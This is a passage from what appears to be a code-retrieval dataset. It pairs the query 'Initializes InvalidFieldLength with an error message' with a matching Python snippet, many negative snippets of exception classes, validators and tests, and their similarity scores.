testConstructorValueError(self):\n test_cases = [\n 'these',\n 'are',\n 'bad',\n 'data',\n 'types',\n 'FILE',\n 'STRING',\n 'JSON',\n ]\n for bad_data_type in test_cases:\n with self.assertRaises(ValueError):\n ASCIITransportFormat(bad_data_type, '')", "def test_init__invalid_error_handler_fails(self):\n\n class InvalidErrorHandler:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"error_handler\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(error_handler=InvalidErrorHandler())", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_set_value_invalid(self):\r\n name = 'option1'\r\n option = self.config.options[name]\r\n value = 'invalid'\r\n initial_value = self.config.values[name]\r\n\r\n self.assertRaises(InvalidOptionValueError, self.config.set_value, name, option, value)\r\n self.assertEqual(self.config.values[name], initial_value)", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: D1Line(self.bad_line))", "def validate_format(self):\n raise NotImplementedError()", "def opt_format(self, fmt):\n key = get_enum_key(fmt, FORMATTERS)\n if key is not None:\n self.conf[\"format\"] = key\n print(\"Set format %r\" % key)\n else:\n print(\"Unknown format %r\" % fmt)", "def __init__(self, module, message, _type, exc_message=None, *args, **kwargs):\n logger.error(\"[{}] {} {} {}\".format(module,\n _type,\n '<{}>'.format(exc_message) if exc_message else '',\n message))\n super(CliException, self).__init__(message, *args)\n self.message = message\n self.type = _type\n self.exc_message = exc_message\n self.str_at_error = kwargs.get('str_at_error', None)", "def validate(self):\n if self.params.get(\"format\"):\n if self.params[\"format\"] not in formats:\n raise ValueError(f\"format must be one of {formats}: {self.dt}\")\n for p in self.required:\n if not self.params.get(p):\n raise ValueError(f\"{p} missing: {self.dt}\")", "def test_constructor_bad_value(self):\n self.assertRaises(line_format_errors.InputLineError,\n lambda: C2Line(self.bad_line))", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def __init__(self, source, bad):\n super(RequestFormatException, self).__init__()\n self.source = source\n self.bad = bad", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def __init__(self, raise_error: Optional[bool] = False):\n self.raise_error = raise_error", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def __init__(self, exception, message=\"Invalid requests parse!\"):\n self.message = message\n self.exception = exception\n super().__init__(self.message)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __str__(self):\n return \"ParseException: %s\" % self.__msg", "def setup_fmt(self, ctx):\n ctx.implicit_errors = False", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(self):\n self.message = \"Invalid time zone string, choose one from https://stackoverflow.com/questions/13866926/is-there-a-list-of-pytz-timezones.\"", "def _validate_format(self, full_encrypted_value, **options):\n\n if not self.FORMAT_REGEX.match(full_encrypted_value):\n raise InvalidEncryptedValueError('Input value is not a valid '\n '[{current}] encryption value.'\n .format(current=self._get_algorithm()))", "def init(self, *args, **kwargs):\n try:\n self._init(*args, **kwargs)\n except (ValueError, TypeError, UnicodeError, ConfigParser.Error), exc:\n raise ConfigInvalidError, str(exc), sys.exc_info()[2]", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def set_error(self, code: Optional[int] = None, text: Optional[str] = None) -> None:\n if code is not None:\n self.error_code = code\n if text is not None:\n self.error_text = text", "def pm_error(vector, format_string):\n return (format_string + \" +\" + format_string + \" -\" + format_string) % \\\n pm_vector(vector)", "def test_set_property_invalid(self):\r\n try:\r\n initial_value = self.config.values['option1']\r\n self.config.option1 = 'invalid'\r\n except Exception as e:\r\n self.assertIsInstance(e, InvalidOptionValueError)\r\n self.assertEqual(self.config.values['option1'], initial_value)", "def __init__(self, message, file_handle, format):\n oh = open(file_handle, \"rU\")\n config.log.critical(\"Unrecognised file format\")\n print(\"-----------------------\")\n print(\"Diagnostic:\")\n print(\"0:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"1:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"2:\", oh.readline().rstrip(\"\\r\\n\"))\n print(\"3:\", oh.readline().rstrip(\"\\r\\n\"))\n if \"sniffer\" in format:\n print(\"Format Specifier: Sniffer (guess the file format)\")\n else:\n print(\n \"Format Specifier: %s\"\n % \" \".join(\"%s:%s\" % (key, format[key]) for key in format)\n )\n\n print(\"-----------------------\")\n config.log.critical(\"%s\" % (message,))\n print()", "def format_error(invalid, doc_type):\n # using string for checking is probably not ideal,\n # but voluptuous does not have specific sub error\n # types for these errors\n if invalid.error_message == 'extra keys not allowed':\n msg = \"Key '{}' is not allowed\".format(invalid.path[0])\n elif invalid.error_message == 'required key not provided':\n msg = \"{} '{}' is missing\".format(doc_type, invalid.path[0])\n else:\n msg = invalid.message\n return {'message': msg, 'field': str(invalid.path[0])}", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def show_validation_error(\n file_path: Optional[Union[str, Path]] = None,\n *,\n title: Optional[str] = None,\n desc: str = \"\",\n show_config: Optional[bool] = None,\n hint_fill: bool = True,\n):\n try:\n yield\n except ConfigValidationError as e:\n title = title if title is not None else e.title\n if e.desc:\n desc = f\"{e.desc}\" if not desc else f\"{e.desc}\\n\\n{desc}\"\n # Re-generate a new error object with overrides\n err = e.from_error(e, title=\"\", desc=desc, show_config=show_config)\n msg.fail(title)\n print(err.text.strip())\n if hint_fill and \"value_error.missing\" in err.error_types:\n config_path = (\n file_path\n if file_path is not None and str(file_path) != \"-\"\n else \"config.cfg\"\n )\n msg.text(\n \"If your config contains missing values, you can run the 'init \"\n \"fill-config' command to fill in all the defaults, if possible:\",\n spaced=True,\n )\n print(f\"{COMMAND} init fill-config {config_path} {config_path} \\n\")\n sys.exit(1)\n except InterpolationError as e:\n msg.fail(\"Config validation error\", e, exits=1)", "def test_parser_init_with_invalid_project_type(parser):\n with pytest.raises(SystemExit):\n parser.parse_args(['--init', 'error'])", "def error_dialog(self, title, message):\n return self._impl.error_dialog(title, message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def _raise_argument_validation_exception(typedef, value, detail, expected_tokens=None):\n typedef_name = typedef.get('help-name')\n if typedef_name is None:\n typedef_name = typedef.get('name')\n if typedef_name is None:\n typedef_name = typedef.get('field')\n if typedef_name is None:\n typedef_name = '<unknown-type>'\n if detail is None:\n detail = ''\n validation_error_format = typedef.get('validation-error-format',\n 'Invalid %(typedef)s: %(value)s; %(detail)s')\n validation_error = (validation_error_format %\n {'typedef': typedef_name, 'value': str(value), 'detail': detail})\n raise error.ArgumentValidationError(validation_error, expected_tokens)", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def unsuported_format(self, msg):\n raise UnsupportedError(self.file.name+\" linker map format not supported by parser:\\n \"+ msg)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def valid_source_format(self, valid_source_format):\n\n self._valid_source_format = valid_source_format", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")", "def handle_invalid_parameter(message_id, *format, status = HttpStatus.BAD_REQUEST, var = (None, None)):\n\tif (var[1] and var[0] is None):\n\t\treturn handle_invalid_parameter(\"invalid_value\", var[1])\n\n\tmessage = MSG[message_id].copy()\n\tmessage[\"message\"] = message[\"message\"].format(*format)\n\treturn json_response(message, status)", "def setErrorMessage(self, errorText, errorColor = 0):\n\n if (errorColor == 1):\n errorColor = \"QTextEdit {color:Green}\"\n elif (errorColor == 0):\n errorColor = \"QTextEdit {color:red}\"\n else:\n # Why did you do this? Read the function? I'm going to make the text white to punish you\n errorColor = \"QTextEdit {color:white}\"\n \n node = EditUtil.EditUtil().getParameterNode()\n node.SetParameter(\"TraceAndSelect,errorMessage\", str(errorText))\n node.SetParameter(\"TraceAndSelect,errorMessageColor\", str(errorColor))\n return", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def error(self, message: str) -> None:\n lines = message.split('\\n')\n linum = 0\n formatted_message = ''\n for line in lines:\n if linum == 0:\n formatted_message = 'Error: ' + line\n else:\n formatted_message += '\\n ' + line\n linum += 1\n\n self.print_usage(sys.stderr)\n\n # Format errors with style_warning()\n formatted_message = ansi.style_warning(formatted_message)\n self.exit(2, '{}\\n\\n'.format(formatted_message))", "def formatError(self,error):\n return '<font color=\"#f00\"><b><i>%s</i></b></font><br />\\n' % error", "def _config_error(self, message, status=2):\n self.parser.exit(status, f\"{self.parser.prog}: failed loading config: {message}\\n\")", "def __init__(self, value: str):\n self.options = [\n \"m\",\n ]", "def test_single_specifier_missing(self):\n template = 'missing'\n value_count = 1\n msg = 'The formatter should contain one \"{}\" specifier.'\n with six.assertRaisesRegex(self, ValidationError, msg):\n validate_str_substitution(template, value_count)", "def generateerrormessage(self, cheqbalvalid=False, savebalvalid=False,\r\n cheqcsvvalid=False, savecsvvalid=False,\r\n pdfdirvalid=False):\r\n error_message = ''\r\n if not cheqbalvalid:\r\n error_message += ('Initial chequing balance must be a number ' +\r\n 'with a maximum of two decimal places.\\n')\r\n if not savebalvalid:\r\n error_message += ('Initial saving balance must be a number ' +\r\n 'with a maximum of two decimal places.\\n')\r\n if not cheqcsvvalid:\r\n error_message += ('Chequing csv must be an existing .csv or ' +\r\n '.txt file.\\n')\r\n if not savecsvvalid:\r\n error_message += ('Saving csv must be an existing .csv or ' +\r\n '.txt file.\\n')\r\n if not pdfdirvalid:\r\n error_message += ('Entry of directory to save pdf, must exist.\\n')\r\n\r\n messagebox.showerror('Entry Error', error_message)", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def test_allProtosDisabledError(self):\n options = Options()\n self.assertRaises(\n UsageError, options.parseOptions, ([\"--no-pop3\", \"--no-smtp\"])\n )", "def test_init__invalid_logger_fails(self):\n\n class InvalidLogger:\n pass\n\n with self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException, 'Provided \"logger\" is in an invalid format.',\n ):\n config_manager.StaticConfigManager(logger=InvalidLogger())", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def test_validation_wrong_options():\n options = [\n (\"found unknown parameter\", {'unknown_options': 3}),\n (\"parameter minimize=100 is incompatible with True\", {'minimize': 100}),\n (\"invalid literal for int\", {'processes_per_experiment': 'incorrect_string'})\n ]\n for regex, option in options:\n yield assert_raises_regexp, YamlParseError, regex, ExperimentBuilder._validate_options, option, True", "def __init__(self, port):\n super(InvalidPort, self).__init__(\n 'The port (\"{0}\") is not valid.'.format(port))", "def _raise_value_error(self, option, typestring, value):\n qual = option._qualified_name()\n if qual[0] == 'trac.ini':\n raise ConfigurationError(\n _('trac.ini [%(sec)s] %(opt)s = \"%(val)s\": invalid %(type)s',\n sec=self.section, opt=qual[1],\n type=typestring, val=repr(value)))\n if qual[0] == 'macroarg':\n raise ValueError(\n _('macro argument %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))\n if qual[0] == 'default':\n raise TracError(\n _('plugin default %(opt)s = \"%(val)s\": invalid %(type)s',\n opt=qual[1], type=typestring, val=repr(value)))", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n if not callable(self.accepted_minimum_provider) and \\\n not callable(self.accepted_maximum_provider) and \\\n self.accepted_minimum is not None and self.accepted_maximum is not None \\\n and self.accepted_minimum > self.accepted_maximum:\n raise MinimumValueLargerThanMaximumValueError('Accepted minimum value for '\n 'validator [{name}] could not be '\n 'larger than accepted maximum value.'\n .format(name=self))\n\n self._validate_exception_type(self.range_value_error)" ]
[ "0.59847456", "0.5878398", "0.5871973", "0.5698404", "0.5652391", "0.5610471", "0.5598633", "0.5526274", "0.5502418", "0.5481143", "0.54788643", "0.54560614", "0.5371777", "0.53679717", "0.53327733", "0.53201747", "0.52955824", "0.52891856", "0.5285651", "0.5220381", "0.51965994", "0.51859534", "0.51859534", "0.51859534", "0.51381797", "0.5125947", "0.5115851", "0.51144046", "0.5113572", "0.5105339", "0.51053303", "0.5101762", "0.50843394", "0.5076106", "0.5055994", "0.50527275", "0.50453955", "0.5045148", "0.5043948", "0.50418144", "0.5009198", "0.50012946", "0.499825", "0.4996366", "0.49878788", "0.49874875", "0.4984682", "0.49747175", "0.49712592", "0.49696645", "0.4961283", "0.49486414", "0.49431533", "0.49325177", "0.49321282", "0.4918043", "0.49150202", "0.49141705", "0.4896577", "0.4892512", "0.4889117", "0.4886641", "0.4886312", "0.48834065", "0.4875004", "0.48722568", "0.48706177", "0.48673418", "0.48498484", "0.48473257", "0.48422447", "0.48349395", "0.48302326", "0.48274013", "0.48188207", "0.48147893", "0.4799852", "0.47989005", "0.47925532", "0.47868362", "0.47861636", "0.4781615", "0.4781615", "0.47653362", "0.47613898", "0.476067", "0.47567353", "0.47540504", "0.4753414", "0.47365284", "0.47363976", "0.47296193", "0.4722344", "0.4721958", "0.4721934", "0.47209188", "0.47150713", "0.47116524", "0.47104523", "0.47095472", "0.4708898" ]
0.0
-1
Initializes InvalidFieldLength with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_validation_fails_with_invalid_field_length(self):\n\n result = LandCompensationLandSoldValidator.validate(INVALID_FIELD_LENGTH, INVALID_FIELD_LENGTH)\n self.assertEqual(2, len(result.errors))\n self.assertEqual('Answer too long', result.errors['land-sold-description'].summary_message)\n self.assertEqual('Answer too long', result.errors['land-works-particulars'].summary_message)", "def validate(cls, **kwargs: Any) -> None:\n max_length = kwargs.get(\"max_length\", None)\n if max_length <= 0:\n raise ModelDefinitionError(\n \"Parameter max_length is required for field String\"\n )", "def test_invalidMaxLength(self):\n self.assertRaises(ValueError, self.client.msg, \"foo\", \"bar\", 0)\n self.assertRaises(ValueError, self.client.msg, \"foo\", \"bar\", 3)", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, error_type: str):\n self.message = ''\n\n if error_type == 'length':\n self.message = 'Password must be between 6 and 100 characters long'\n\n elif error_type == 'one_lower':\n self.message = 'Password must contain at least one lowercase letter'\n\n elif error_type == 'one_upper':\n self.message = 'Password must contain at least one uppercase letter'\n\n elif error_type == 'one_digit':\n self.message = 'Password must contain at least one number'\n\n logging.error(str(self))\n super().__init__(self.message)", "def test_init_chunk_size_field_below_range(self):\n test_config = TestConfig(chunk_size=-1)\n with self.assertRaises(ValidationError):\n test_config.clean_fields()", "def testMessageFieldValidate_Initialized(self):\n class MyMessage(messages.Message):\n field1 = messages.IntegerField(1, required=True)\n\n field = messages.MessageField(MyMessage, 10)\n\n # Will validate messages where is_initialized() is False.\n message = MyMessage()\n field.validate(message)\n message.field1 = 20\n field.validate(message)", "def message_error_validator():\n\n return validator.MessageErrorSchema()", "def get_field_length_error_text(field_name):\n\n\treturn(\"Value entered for '{0}' exceeds character length limit of {1}\"\n\t\t .format(field_name, str(field_length_limit)))", "def validate(cls, **kwargs: Any) -> None:\n max_length = kwargs.get(\"max_length\", None)\n if max_length <= 0:\n raise ModelDefinitionError(\n \"Parameter max_length is required for field LargeBinary\"\n )", "def _update_length(self, field, tag_id, value):\n # pylint: disable=unused-argument\n if tag_id not in {8, 9, 10}:\n self._message_length += len(field) + 1\n if self._message_length >= self._max_length:\n raise FIXLengthTooLongError(\n f'message too long: {self._message_length}')", "def test_femattribute_length_different_error(self):\n with self.assertRaises(ValueError):\n FEMAttribute('', [1, 2, 3], [10., 20., 30., 40.])", "def test_init_bytes_field_below_range(self):\n test_config = TestConfig(bytes=-1)\n with self.assertRaises(ValidationError):\n test_config.clean_fields()", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, *args, **kwargs):\n kwargs[\"max_length\"] = 49\n super().__init__(*args, **kwargs)", "def __init__(self, min_length=None, max_length=None):\n self.min_length = min_length\n self.max_length = max_length", "def __init__(self, min_length=None, max_length=None):\n self.min_length = min_length\n self.max_length = max_length", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def __init__(self, msg):\n\n super(DBValueError, self).__init__(msg)\n self.msg = msg", "def test_models_meetings_name_maxlength(self):\n MeetingFactory(name=\"a\" * 500)\n with self.assertRaises(ValidationError) as context:\n MeetingFactory(name=\"a\" * 501)\n\n self.assertEqual(\n context.exception.messages,\n [\"Ensure this value has at most 500 characters (it has 501).\"],\n )", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def test_more_than_max_length_invalid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']) + 1)]))\n\n with self.assertRaises(ValidationError):\n valid_password(None, pass_field)", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def testValidate_Required(self):\n class SimpleMessage(messages.Message):\n required = messages.IntegerField(1, required=True)\n\n simple_message = SimpleMessage()\n self.assertRaises(messages.ValidationError,\n simple_message.check_initialized)\n simple_message.required = 10\n simple_message.check_initialized()", "def __init__(self):\n self.message = \"Boundary too large, must be less than one degree of latitude and longitude.\"", "def __init__(self, length=None, field1=None, field2=None, field3=None,\n field4=None):\n super().__init__()\n self.length = length\n self.field1 = field1\n self.field2 = field2\n self.field3 = field3\n self.field4 = field4", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, domain, field, **options):\n\n super().__init__(domain, field, **options)\n\n inclusive_maximum = options.get('inclusive_maximum')\n if inclusive_maximum is None:\n if self.default_inclusive_maximum is not None:\n inclusive_maximum = self.default_inclusive_maximum\n else:\n inclusive_maximum = True\n\n if self.default_accepted_maximum is None and \\\n (self.field is None or self.field.max_value is None):\n raise AcceptedMaximumValueMustBeProvidedError('Accepted maximum value for '\n 'validator [{name}] could not '\n 'be None.'.format(name=self))\n\n self._inclusive_maximum = inclusive_maximum\n self._instance_accepted_maximum = None\n if self.default_accepted_maximum is None:\n self._instance_accepted_maximum = self.field.max_value\n\n self._validate_exception_type(self.maximum_value_error)", "def test_validate_max_length(self):\n test_strings = [\n 'thisloooooooooooooooongstring',\n True,\n 45,\n ]\n\n testrow = TestSchema()\n\n for test_string in test_strings:\n testrow.string_max_field = test_string\n self.assertRaises(Exception, testrow.save)", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def error_message(self, error_message):\n if (self.local_vars_configuration.client_side_validation and\n error_message is not None and len(error_message) > 500):\n raise ValueError(\"Invalid value for `error_message`, length must be less than or equal to `500`\") # noqa: E501\n\n self._error_message = error_message", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_value_init18(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(0, 19)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def testValidation(self):\n # Test optional.\n class SubMessage(messages.Message):\n pass\n\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1)\n\n message = Message()\n\n message_field = messages.MessageField(Message, 1)\n message_field.validate(message)\n message.val = SubMessage()\n message_field.validate(message)\n self.assertRaises(messages.ValidationError,\n setattr, message, 'val', [SubMessage()])\n\n # Test required.\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1, required=True)\n\n message = Message()\n\n message_field = messages.MessageField(Message, 1)\n message_field.validate(message)\n message.val = SubMessage()\n message_field.validate(message)\n self.assertRaises(messages.ValidationError,\n setattr, message, 'val', [SubMessage()])\n\n # Test repeated.\n class Message(messages.Message):\n val = messages.MessageField(SubMessage, 1, repeated=True)\n\n message = Message()\n\n message_field = messages.MessageField(Message, 1)\n message_field.validate(message)\n self.assertRaisesWithRegexpMatch(\n messages.ValidationError,\n \"Field val is repeated. Found: <SubMessage>\",\n setattr, message, 'val', SubMessage())\n # pylint: disable=redefined-variable-type\n message.val = [SubMessage()]\n message_field.validate(message)", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. \"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def __init__(self, for_field, *args, **kwargs):\n self.for_field = for_field\n kwargs.setdefault(\"db_index\", True)\n kwargs.setdefault(\"editable\", False)\n kwargs.setdefault(\"max_length\", 255)\n\n # For use in pre_save()\n self.max_length = kwargs[\"max_length\"]\n\n super().__init__(**kwargs)", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def test_validate_min_length(self):\n\n test_strings = [\n 'oa',\n 'al',\n 'v',\n ]\n\n testrow = TestSchema()\n\n for test_string in test_strings:\n testrow.string_min_field = test_string\n self.assertRaises(Exception, testrow.save)", "def __init__(self, field, *, char, **extra):\n if len(char) != 1:\n raise ValueError('CharCount must count exactly one char.')\n super().__init__(field, char=char, **extra)", "def test_less_than_min_length_invalid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MIN_PWD_LEN']) - 1)]))\n\n with self.assertRaises(ValidationError):\n valid_password(None, pass_field)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_splitValidatesLength(self):\n self.assertRaises(ValueError, irc.split, \"foo\", 0)\n self.assertRaises(ValueError, irc.split, \"foo\", -1)", "def add_error(self, field, message):\n add_list_value(self.errors, field, message)", "def test_value_init15(self):\n with self.assertRaises(ValueError) as err:\n r1 = Rectangle(0, 0)\n msg = \"width must be > 0\"\n self.assertEqual(str(err.exception), msg)", "def validate_max_length(cls, value: str, field: ModelField) -> str:\n if cls.max_length is not None and len(value) > cls.max_length:\n raise InvalidLengthValue(\n field_name=field.name, constraint=cls.max_length, operation='max'\n )\n return value", "def test_error_when_length_mismatch(self):\n self._assert_raise_error(\n probabilities=[0.5, 0.5],\n random_nums=[0],\n error=LengthMismatchError,\n code=1\n )", "def validate_min_length(cls, value: str, field: ModelField) -> str:\n if cls.min_length is not None and len(value) < cls.min_length:\n raise InvalidLengthValue(\n field_name=field.name, constraint=cls.min_length, operation='min'\n )\n return value", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, minlen=0, maxlen=six.MAXSIZE, regex=\"\"):\n self.minlen = max(0, minlen)\n self.maxlen = max(self.minlen, maxlen)\n self.regex = regex\n self._init()", "def _validate_input(self):\n\n if is_empty(self.message) == True:\n 